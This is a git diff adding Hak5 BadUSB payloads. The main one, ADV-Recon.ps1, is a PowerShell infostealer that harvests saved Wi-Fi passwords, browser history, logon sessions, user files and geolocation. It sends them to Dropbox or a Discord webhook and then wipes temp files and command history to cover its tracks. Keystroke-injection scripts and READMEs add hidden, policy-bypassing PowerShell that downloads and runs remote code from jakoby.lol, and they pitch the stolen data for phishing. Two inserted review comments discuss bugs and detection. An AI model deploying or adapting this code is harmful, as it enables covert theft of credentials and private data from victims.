diff --git a/Payloads/ADV-Recon/ADV-Recon.ps1 b/Payloads/ADV-Recon/ADV-Recon.ps1
new file mode 100644
index 0000000..4743950
--- /dev/null
+++ b/Payloads/ADV-Recon/ADV-Recon.ps1
@@ -0,0 +1,588 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 2.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# tiktok.com/@i_am_jakoby # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.SYNOPSIS + This is an advanced recon of a target PC and exfiltration of that data. +.DESCRIPTION + This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running. + All of the gather information is formatted neatly and output to a file. + That file is then exfiltrated to cloud storage via Dropbox. 
+.Link + https://developers.dropbox.com/oauth-guide # Guide for setting up your Dropbox for uploads + https://www.youtube.com/watch?v=Zs-1j42ySNU # My youtube tutorial on Discord Uploads + https://www.youtube.com/watch?v=VPU7dFzpQrM # My youtube tutorial on Dropbox Uploads +#> + +############################################################################################################################################################ + +# MAKE LOOT FOLDER, FILE, and ZIP + +$FolderName = "$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm)" + +$FileName = "$FolderName.txt" + +$ZIP = "$FolderName.zip" + +New-Item -Path $env:tmp/$FolderName -ItemType Directory + +############################################################################################################################################################ + +# Enter your access tokens below. At least one has to be provided but both can be used at the same time. + +#$db = "" + +#$dc = "" + +############################################################################################################################################################ + +# Recon all User Directories +tree $Env:userprofile /a /f >> $env:TEMP\$FolderName\tree.txt + +# Powershell history +Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination $env:TEMP\$FolderName\Powershell-History.txt + +############################################################################################################################################################ + +function Get-fullName { + + try { + $fullName = (Get-LocalUser -Name $env:USERNAME).FullName + } + + # If no name is detected function will return $env:UserName + + # Write Error is just for troubleshooting + catch {Write-Error "No name was detected" + return $env:UserName + -ErrorAction SilentlyContinue + } + + return $fullName + +} + +$fullName = Get-fullName + 
+#------------------------------------------------------------------------------------------------------------------------------------ + +function Get-email { + + try { + + $email = (Get-CimInstance CIM_ComputerSystem).PrimaryOwnerName + return $email + } + +# If no email is detected function will return backup message for sapi speak + + # Write Error is just for troubleshooting + catch {Write-Error "An email was not found" + return "No Email Detected" + -ErrorAction SilentlyContinue + } +} + +$email = Get-email + + +#------------------------------------------------------------------------------------------------------------------------------------ + +function Get-GeoLocation{ + try { + Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace + $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object + $GeoWatcher.Start() #Begin resolving current locaton + + while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) { + Start-Sleep -Milliseconds 100 #Wait for discovery. + } + + if ($GeoWatcher.Permission -eq 'Denied'){ + Write-Error 'Access Denied for Location Information' + } else { + $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results. 
+ } + } + # Write Error is just for troubleshooting + catch {Write-Error "No coordinates found" + return "No Coordinates found" + -ErrorAction SilentlyContinue + } + +} + +$GeoLocation = Get-GeoLocation + +$GeoLocation = $GeoLocation -split " " + +$Lat = $GeoLocation[0].Substring(11) -replace ".$" + +$Lon = $GeoLocation[1].Substring(10) -replace ".$" + +############################################################################################################################################################ + +# local-user + +$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID | Out-String + +############################################################################################################################################################ + +Function Get-RegistryValue($key, $value) { (Get-ItemProperty $key $value).$value } + +$Key = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" +$ConsentPromptBehaviorAdmin_Name = "ConsentPromptBehaviorAdmin" +$PromptOnSecureDesktop_Name = "PromptOnSecureDesktop" + +$ConsentPromptBehaviorAdmin_Value = Get-RegistryValue $Key $ConsentPromptBehaviorAdmin_Name +$PromptOnSecureDesktop_Value = Get-RegistryValue $Key $PromptOnSecureDesktop_Name + +If($ConsentPromptBehaviorAdmin_Value -Eq 0 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = "Never notIfy" } + +ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = "NotIfy me only when apps try to make changes to my computer(do not dim my desktop)" } + +ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = "NotIfy me only when apps try to make changes to my computer(default)" } + +ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 2 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = "Always notIfy" } + +Else{ $UAC = "Unknown" } + 
+############################################################################################################################################################ + +$lsass = Get-Process -Name "lsass" + +if ($lsass.ProtectedProcess) {$lsass = "LSASS is running as a protected process."} + +else {$lsass = "LSASS is not running as a protected process."} + +############################################################################################################################################################ + +$StartUp = (Get-ChildItem -Path ([Environment]::GetFolderPath("Startup"))).Name + +############################################################################################################################################################ + +# Get nearby wifi networks + +try +{ +$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim() +} +catch +{ +$NearbyWifi="No nearby wifi networks detected" +} + +############################################################################################################################################################ + +# Get info about pc + +# Get IP / Network Info + +try{$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content} +catch{$computerPubIP="Error getting Public IP"} + +try{$localIP = Get-NetIPAddress -InterfaceAlias "*Ethernet*","*Wi-Fi*" -AddressFamily IPv4 | Select InterfaceAlias, IPAddress, PrefixOrigin | Out-String} +catch{$localIP = "Error getting local IP"} + +$MAC = Get-NetAdapter -Name "*Ethernet*","*Wi-Fi*"| Select Name, MacAddress, Status | Out-String + +# Check RDP + +if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) { + $RDP = "RDP is Enabled" +} else { + $RDP = "RDP is NOT enabled" +} + +############################################################################################################################################################ + 
+#Get System Info +$computerSystem = Get-CimInstance CIM_ComputerSystem + +$computerName = $computerSystem.Name + +$computerModel = $computerSystem.Model + +$computerManufacturer = $computerSystem.Manufacturer + +$computerBIOS = Get-CimInstance CIM_BIOSElement | Out-String + +$computerOs=(Get-WMIObject win32_operatingsystem) | Select Caption, Version | Out-String + +$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List | Out-String + +$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List | Out-String + +$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} | Out-String + +$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table | Out-String + +############################################################################################################################################################ + +$ScheduledTasks = Get-ScheduledTask + +############################################################################################################################################################ + +$klist = klist sessions + +############################################################################################################################################################ + +$RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 50 FullName, LastWriteTime + +############################################################################################################################################################ + +# Get HDDs +$driveType = @{ + 2="Removable disk " + 3="Fixed local disk " + 4="Network disk " + 5="Compact disk "} +$Hdds = 
Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } | Out-String + +#Get - Com & Serial Devices +$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table | Out-String -width 250 + +############################################################################################################################################################ + +# Get Network Interfaces +$NetworkAdapters = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress | Out-String -width 250 + +$wifiProfiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String + +############################################################################################################################################################ + +# process first +$process=Get-WmiObject win32_process | select Handle, ProcessName, 
ExecutablePath, CommandLine | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine | Out-String -width 250 + +# Get Listeners / ActiveTcpConnections +$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess +$listener = $listener | foreach-object { + $listenerItem = $_ + $processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess }) + new-object PSObject -property @{ + "LocalAddress" = $listenerItem.LocalAddress + "RemoteAddress" = $listenerItem.RemoteAddress + "State" = $listenerItem.State + "AppliedSetting" = $listenerItem.AppliedSetting + "OwningProcess" = $listenerItem.OwningProcess + "ProcessName" = $processItem.ProcessName + } +} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table | Out-String -width 250 + +# service +$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName | Out-String -width 250 + +# installed software (get uninstaller) +$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize | Out-String -width 250 + +# drivers +$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion | Out-String -width 250 + +# videocard +$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution | Out-String -width 250 + + 
+############################################################################################################################################################ + +# OUTPUTS RESULTS TO LOOT FILE + +$output = @" + +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _' | | '_ ' _ \ _ | | / _' | | |/ / / _ \ | '_ \ | | | |# 'Y8888888Y' # +# Version : 2.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# 'Y888Y' # +# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# 'Y' # +# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| ('\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(' ') ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# tiktok.com/@i_am_jakoby # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + + +Full Name: $fullName + +Email: $email + +GeoLocation: +Latitude: $Lat +Longitude: $Lon + +------------------------------------------------------------------------------------------------------------------------------ + +Local Users: +$luser + 
+------------------------------------------------------------------------------------------------------------------------------ + +UAC State: +$UAC + +LSASS State: +$lsass + +RDP State: +$RDP + +------------------------------------------------------------------------------------------------------------------------------ + +Public IP: +$computerPubIP + +Local IPs: +$localIP + +MAC: +$MAC + +------------------------------------------------------------------------------------------------------------------------------ + +Computer Name: +$computerName + +Model: +$computerModel + +Manufacturer: +$computerManufacturer + +BIOS: +$computerBIOS + +OS: +$computerOs + +CPU: +$computerCpu + +Mainboard: +$computerMainboard + +Ram Capacity: +$computerRamCapacity + +Total installed Ram: +$computerRam + +Video Card: +$videocard + +------------------------------------------------------------------------------------------------------------------------------ + +Contents of Start Up Folder: +$StartUp + +------------------------------------------------------------------------------------------------------------------------------ + +Scheduled Tasks: +$ScheduledTasks + +------------------------------------------------------------------------------------------------------------------------------ + +Logon Sessions: +$klist + +------------------------------------------------------------------------------------------------------------------------------ + +Recent Files: +$RecentFiles + +------------------------------------------------------------------------------------------------------------------------------ + +Hard-Drives: +$Hdds + +COM Devices: +$COMDevices + +------------------------------------------------------------------------------------------------------------------------------ + +Network Adapters: +$NetworkAdapters + +------------------------------------------------------------------------------------------------------------------------------ + +Nearby Wifi: +$NearbyWifi + +Wifi 
Profiles: +$wifiProfiles + +------------------------------------------------------------------------------------------------------------------------------ + +Process: +$process + +------------------------------------------------------------------------------------------------------------------------------ + +Listeners: +$listener + +------------------------------------------------------------------------------------------------------------------------------ + +Services: +$service + +------------------------------------------------------------------------------------------------------------------------------ + +Installed Software: +$software + +------------------------------------------------------------------------------------------------------------------------------ + +Drivers: +$drivers + +------------------------------------------------------------------------------------------------------------------------------ + +"@ + +$output > $env:TEMP\$FolderName/computerData.txt + +############################################################################################################################################################ + +function Get-BrowserData { + + [CmdletBinding()] + param ( + [Parameter (Position=1,Mandatory = $True)] + [string]$Browser, + [Parameter (Position=1,Mandatory = $True)] + [string]$DataType + ) + + $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' 
+ + if ($Browser -eq 'chrome' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"} + elseif ($Browser -eq 'chrome' -and $DataType -eq 'bookmarks' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"} + elseif ($Browser -eq 'edge' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"} + elseif ($Browser -eq 'edge' -and $DataType -eq 'bookmarks' ) {$Path = "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks"} + elseif ($Browser -eq 'firefox' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite"} + + + $Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique + $Value | ForEach-Object { + $Key = $_ + if ($Key -match $Search){ + New-Object -TypeName PSObject -Property @{ + User = $env:UserName + Browser = $Browser + DataType = $DataType + Data = $_ + } + } + } +} + +Get-BrowserData -Browser "edge" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt + +Get-BrowserData -Browser "edge" -DataType "bookmarks" >> $env:TMP\$FolderName\BrowserData.txt + +Get-BrowserData -Browser "chrome" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt + +Get-BrowserData -Browser "chrome" -DataType "bookmarks" >> $env:TMP\$FolderName\BrowserData.txt + +Get-BrowserData -Browser "firefox" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt + +############################################################################################################################################################ + +Compress-Archive -Path $env:tmp/$FolderName -DestinationPath $env:tmp/$ZIP + +# Upload output file to dropbox + +function dropbox { +$TargetFilePath="/$ZIP" +$SourceFilePath="$env:TEMP\$ZIP" +$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, 
"mute": false }' +$authorization = "Bearer " + $db +$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" +$headers.Add("Authorization", $authorization) +$headers.Add("Dropbox-API-Arg", $arg) +$headers.Add("Content-Type", 'application/octet-stream') +Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers +} + +if (-not ([string]::IsNullOrEmpty($db))){dropbox} + +############################################################################################################################################################ + +function Upload-Discord { + +[CmdletBinding()] +param ( + [parameter(Position=0,Mandatory=$False)] + [string]$file, + [parameter(Position=1,Mandatory=$False)] + [string]$text +) + +$hookurl = "$dc" + +$Body = @{ + 'username' = $env:username + 'content' = $text +} + +if (-not ([string]::IsNullOrEmpty($text))){ +Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; + +if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} +} + +if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:tmp/$ZIP"} + + + +############################################################################################################################################################ + +<# +.NOTES + This is to clean up behind you and remove any evidence to prove you were there +#> + +# Delete contents of Temp folder + +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# Delete run box history + +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history + +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Deletes contents of recycle bin + +Clear-RecycleBin -Force -ErrorAction SilentlyContinue + + 
+############################################################################################################################################################
+
+# Popup message to signal the payload is done
+
+$done = New-Object -ComObject Wscript.Shell;$done.Popup("Update Completed",1)
diff --git a/Payloads/ADV-Recon/ADV-Recon.txt b/Payloads/ADV-Recon/ADV-Recon.txt
new file mode 100644
index 0000000..932c2f6
--- /dev/null
+++ b/Payloads/ADV-Recon/ADV-Recon.txt
@@ -0,0 +1,12 @@
+REM Title: ADV-Recon
+
+REM Author: I am Jakoby
+
+REM Description: This payload is meant to do an advanced recon of the target's PC. See README.md file for more details.
+
+REM Target: Windows 10, 11
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/9nb | iex
+ENTER
diff --git a/Payloads/ADV-Recon/README.md b/Payloads/ADV-Recon/README.md
new file mode 100644
index 0000000..46385f3
--- /dev/null
+++ b/Payloads/ADV-Recon/README.md
@@ -0,0 +1,145 @@
+![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
+
+
+
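Review bot: In `Get-BrowserData` both parameters declare `Position=1`, and the filter `if ($Key -match $Search)` compares against `$Search`, which is never assigned anywhere in this hunk, so the match is against an empty pattern and every extracted URL passes; the if/elseif chain for `$Path` also has no final branch, so an unrecognised Browser/DataType pair reaches `Get-Content -Path $Path` with `$Path` unset. The catch blocks of `Get-fullName`, `Get-email` and `Get-GeoLocation` each put `-ErrorAction SilentlyContinue` on its own line after `return`, where it is never reached; delete it or attach it to the cmdlet call it was meant for. `$Lat = $GeoLocation[0].Substring(11)` and the `$Lon` line run outside any try and assume the `@{Latitude=…; Longitude=…}` string form of the selected object, so the "No Coordinates found" fallback the function returns on failure becomes a Substring range exception at top level. The cleanup block's `rm $env:TEMP\* -r -Force` removes the whole user temp directory rather than only `$FolderName` and `$ZIP`, which is collateral deletion beyond the script's own artifacts. From a defensive reading, the Discord webhook is handed to `curl.exe` as a command-line argument and the Dropbox token goes out as a bearer header from an unpinned `Invoke-RestMethod`, so process command-line auditing and PowerShell script block logging still record the launch and the exfiltration destination; the `reg delete ... RunMRU` and `Remove-Item (Get-PSreadlineOption).HistorySavePath` steps only touch local user artifacts.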
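Review bot: The `STRING` line executes whatever `jakoby.lol/9nb` resolves to at run time (`irm jakoby.lol/9nb | iex`) with no pinning or integrity check, and neither this file nor the README states that trust dependency — the README only says Version 2 "no longer requires you to host your own version". The exfiltration credentials are supplied inline (`$dc='';$db=''`), so the Discord webhook and Dropbox token become part of the powershell process command line. For defenders, this exact shape — a Run-box launch of `powershell -w h -NoP -Ep Bypass` followed by `irm … | iex` — is what PowerShell script block logging (event 4104) and process command-line auditing capture, independent of the cleanup steps in ADV-Recon.ps1. `Payloads/ADV-RickRoll/ADV-RickRoll.txt` later in this diff uses the same unpinned download-and-execute pattern (`irm -Uri 'https://jakoby.lol/qee' … ; . "$D\rr\rr.ps1"`).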
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# ADV-Recon + +A script used to do an advanced level of recon on the target's computer. + +Version 2 no longer requires you to host your own version of the script. + +Modifying the execution script is the only necessary interaction. + +## Description + +This program enumerates a target PC to collect as much recon data as possible for future engagements. This includes: + +* Hosts PowerShell Version (to know what commands can be run) +* Name associated with their Microsoft account (Or ENV UserName variable if one is not detected) +* Whether they are in the Admin group or not +* The email associated with their Microsoft account (for phishing possibilities) +* Other User accounts on their system (for possible privilege escalation) +* Details on their login settings (Ex: Min/Max password age and length) +* How many days since they have changed their password (Max password age - Days since = Opportunity) +* Their GeoLocation (know their approximate where abouts) +* Nearby Wifi Networks (Possible lateral movement) +* Network Info (Local and Public IP Address; MAC Address; RDP Enabled?) +* WLAN Profiles (List of SSIDs and Passwords stored on their PC) +* Network Interfaces (What are they connecting in and out with) +* System Information (Manufacturer, Model, Serial Number, OS, CPU, RAM, Mainboard BIOS) +* Local Users (Accounts on system with Username, name associated with microsoft account and SID) +* Information on their hard drives (Indicator of Recon Scope) +* COM and Serial Devices (Is there a device connected you can manipulate?) +* Active TCP Connections (Poor mans Port Scanning) +* Processes, Services, Software, and Drivers (What is running on the computer we can exploit?) +* Video Card info (how much vroom vroom?) +* Tree Command (Gain a more accurate assessment of what to exfil or use in Phishing attacks) + +## Getting Started + +### Dependencies + +* Dropbox or Discord +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory + +`$dc` is the variable that stores your discord webhook + +`$db` is the variable that stores your dropbox token + +Fill in either or both of these two methods to exfil your collected data + +``` +powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/9nb | iex +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +* 0.2 + * Added additional data queries + * Optimized output of data + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

diff --git a/Payloads/ADV-RickRoll/ADV-RickRoll.txt b/Payloads/ADV-RickRoll/ADV-RickRoll.txt
new file mode 100644
index 0000000..c0f5497
--- /dev/null
+++ b/Payloads/ADV-RickRoll/ADV-RickRoll.txt
@@ -0,0 +1,18 @@
+REM Title: ADV-RickRoll
+
+REM Author: I am Jakoby
+
+REM Description: This is a one liner payload that will Rick Roll your target. Video will be played at full screen and max volume.
+REM Upon deployment, payload will pause until a mouse movement is detected and run once one is.
+
+REM Target: Windows 10, 11
+
+REM --------------------------------------------------------------------------------------
+REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM --------------------------------------------------------------------------------------
+
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/qee' -O "$D\rr.zip";Expand-Archive "$D\rr.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1"
+ENTER
diff --git a/Payloads/ADV-RickRoll/ReadMe.md b/Payloads/ADV-RickRoll/ReadMe.md
new file mode 100644
index 0000000..9addab7
--- /dev/null
+++ b/Payloads/ADV-RickRoll/ReadMe.md
@@ -0,0 +1,120 @@
+![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
+
+
+
+

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# ADV-RickRoll + +A script used to do an advanced rick roll on your target. + +## Description + +This program Rick Rolls your target without opening a muted youtube video. +A Rick Roll video is downloaded and played in your powershell console when a mouse movement is detected. + +## Getting Started + +### Dependencies + +* An internet connection +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload +``` +powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/qee' -O "$D\rr.zip";Expand-Archive "$D\rr.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1" +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ +

+ Github Stats +

diff --git a/Payloads/AcidBurn/AcidBurn.ps1 b/Payloads/AcidBurn/AcidBurn.ps1
new file mode 100644
index 0000000..e845748
--- /dev/null
+++ b/Payloads/AcidBurn/AcidBurn.ps1
@@ -0,0 +1,704 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : AcidBurn | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# tiktok.com/@i_am_jakoby # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby (youtube link with demonstration coming soon) # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.NOTES + This script was not optimized to shorten the code. This script is intended to have as much readability as possible for new coders to learn. + +.DESCRIPTION + This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account. + The SSID and WiFi password of any current or previously connected to networks. + It determines the last day they changed their password and how many days ago. 
+ Once the information is gathered the script will pause until a mouse movement is detected
+ Then the script uses Sapi speak to roast their set up and lack of security
+#>
+############################################################################################################################################################
+
+# Variables
+
+
+$s=New-Object -ComObject SAPI.SpVoice
+
+############################################################################################################################################################
+
+# Intro ---------------------------------------------------------------------------------------------------
+ function Get-fullName {
+
+ try {
+
